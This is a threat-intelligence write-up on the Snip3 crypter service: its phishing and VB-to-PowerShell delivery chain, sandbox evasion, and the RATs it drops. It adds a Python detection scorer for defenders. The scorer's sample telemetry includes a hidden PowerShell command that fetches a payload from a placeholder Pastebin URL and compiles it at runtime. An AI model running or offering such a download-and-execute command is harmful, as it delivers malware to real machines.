A highly sophisticated Crypter-as-a-Service (CaaS) has been discovered delivering various RAT families onto targeted systems. Researchers from Morphisec named this service Snip3 based on the common denominator username discovered inside the PDB indicator of an earlier variant.

What has happened?

Snip3 Crypter's activity was first observed in the wild on February 4 and is still ongoing. The related variants are evasive by design, and only a few security solutions have been able to detect them.
  • The Crypter spreads via phishing emails that lead to the download of a VB file or script. In some instances, the attack starts with a large install file, such as an Adobe installer, that bundles the next stage.
  • The VB script exists only to load the second-stage PowerShell script and hand execution over to it.
  • This initial loader stage comes in four versions with 11 sub-versions in total. All four versions share the same second-stage PowerShell loading mechanism; the 11 sub-versions differ mainly in the type of obfuscation each one uses.
  • The four PowerShell scripts deliver several RATs, including AsyncRAT 0.5.7B, RevengeRAT, and Agent Tesla.

Advanced techniques to bypass detection

Snip3 uses multiple advanced techniques to bypass detection, which make this service more lethal.
  • It executes PowerShell code with the ‘remotesigned’ execution-policy parameter, uses services such as Pastebin and top4top for staging, and compiles the RunPE loaders on the endpoint at runtime.
  • In addition, the crypter service checks for VMware virtualization and Windows Sandbox in order to evade sandbox analysis.
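The delivery chain and evasion tricks listed above (VB script launching PowerShell, a ‘remotesigned’ execution policy, staging on Pastebin or top4top, runtime compilation of the loader, VM and sandbox checks) all leave traces in process-creation telemetry. The following is an added detection example written for this page; it is not code from the Cyware article or from Morphisec's research. It runs a scoring routine over a few constructed process-creation records shaped like Sysmon Event ID 1 fields (parent image, image, command line). The field names, the `top4top.io` host name, and the sample command lines are assumptions made for illustration.

```python
import re
from dataclasses import dataclass, field

# The article names Pastebin and top4top as staging services; the ".io" TLD
# for top4top is an assumption added for the constructed sample data.
STAGING_HOSTS = ("pastebin.com", "top4top.io")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")   # Windows VBScript interpreters
POWERSHELL = ("powershell.exe", "pwsh.exe")


@dataclass
class ProcessEvent:
    """Subset of a process-creation record (Sysmon Event ID 1 style; assumed shape)."""
    parent_image: str
    image: str
    command_line: str


@dataclass
class Verdict:
    indicators: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A single indicator (an admin running a RemoteSigned script, say) is
        # normal; the Snip3 chain stacks several of them in one launch.
        return len(self.indicators) >= 2


def _basename(path: str) -> str:
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def analyze(ev: ProcessEvent) -> Verdict:
    """Score one PowerShell launch against the behaviours the article describes."""
    v = Verdict()
    if _basename(ev.image) not in POWERSHELL:
        return v
    cl = ev.command_line.lower()
    if _basename(ev.parent_image) in SCRIPT_HOSTS:
        v.indicators.append("powershell launched by a script host (VBS first stage)")
    # Matches -ep / -exec / -executionpolicy followed by remotesigned.
    if re.search(r"-e[px]\w*\s+remotesigned", cl):
        v.indicators.append("remotesigned execution policy on the command line")
    if any(host in cl for host in STAGING_HOSTS):
        v.indicators.append("payload staged on a public paste/file host")
    # In-process C# compilation is how a RunPE loader gets built at runtime.
    if "add-type" in cl or "codedom" in cl:
        v.indicators.append("runtime compilation (Add-Type/CodeDom)")
    # WDAGUtilityAccount is the default user account inside Windows Sandbox.
    if re.search(r"vmware|wdagutilityaccount", cl):
        v.indicators.append("virtualization/sandbox check")
    return v


def scan(events):
    """Return one Verdict per event, in input order."""
    return [analyze(e) for e in events]


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    # Snip3-like chain: VBS host spawns PowerShell that pulls a stage from a paste site
    ProcessEvent(
        parent_image=r"C:\Windows\System32\wscript.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line=(
            'powershell.exe -ep remotesigned -w hidden -c "$src=(New-Object Net.WebClient)'
            ".DownloadString('https://pastebin.com/raw/PLACEHOLDER'); "
            'Add-Type -TypeDefinition $src"'
        ),
    ),
    # Benign: an interactive user runs a local maintenance script
    ProcessEvent(
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line=r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\nightly-backup.ps1",
    ),
    # Not PowerShell at all
    ProcessEvent(
        parent_image=r"C:\Windows\System32\cmd.exe",
        image=r"C:\Windows\System32\notepad.exe",
        command_line="notepad.exe readme.txt",
    ),
]

if __name__ == "__main__":
    for ev, verdict in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(_basename(ev.image), "suspicious" if verdict.suspicious else "ok", verdict.indicators)
```

The threshold of two stacked indicators is what keeps the benign RemoteSigned launch out of the alert queue; in a real deployment the parent/child relationship and the staging-host hit are the two signals worth weighting highest, since both are specific to this chain rather than to PowerShell use in general.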

Conclusion

Snip3 can identify sandbox and virtual environments, which lets it bypass detection-centric solutions. Organizations need to make sure their detection-focused stacks account for attacks that employ the Snip3 Crypter service and similar ones.

Cyware Publisher
